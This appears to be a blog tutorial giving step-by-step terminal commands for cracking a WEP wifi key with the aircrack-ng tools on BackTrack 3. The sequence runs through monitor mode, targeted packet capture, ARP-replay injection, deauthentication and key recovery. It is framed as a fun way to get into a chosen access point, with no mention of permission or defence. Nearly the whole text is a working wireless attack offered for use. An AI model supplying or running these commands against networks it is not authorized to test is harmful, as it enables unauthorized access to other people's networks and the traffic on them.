After you have booted into BackTrack 3, we are ready for the fun part. The first thing we will do is shutdown our wifi card. In the terminal:

ifconfig ath0 down

Next we want to bring it back up, but in monitor mode:

airmon-ng start wifi0

You should see that a new interface called ath1 was created. That is the interface we are going to use for the rest of our cracking. Next:

airodump-ng ath1

This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don’t want to write thpre down, just open a new shell and leave that one open.

Now press

ctrl+c

to stop airodump-ng. Open a new console (if you haven’t already) and type:

airodump-ng --channel x --bssid y -w filename ath1

Where x and y are the channel and bssid that you wrote down, respectively, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I’m searching through my cracked WEP files I know whats what.

Now leave that running and open another shell. Type

ifconfig

next to

ath1

write down the first 6 sets of numbers in the long string next to HWaddr, replacing the dashes with colons (e.g. 00:11:22:33:44:55). That is your computer’s MAC address, whereas the bssid is the Access Point’s MAC address that you’re trying to hack.

Okay, now in the same window that you typed

ifconfig

, type:

aireplay-ng --arpreplay -b [Access Point's MAC] -h [Your MAC] ath1

Now leave that running and open yet another shell, and type:

aireplay-ng --deauth 5 -c [Your Mac] -a [Access Point's MAC] ath1

Now in that same window type:

aircrack-ng filename*.cap

Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arrise.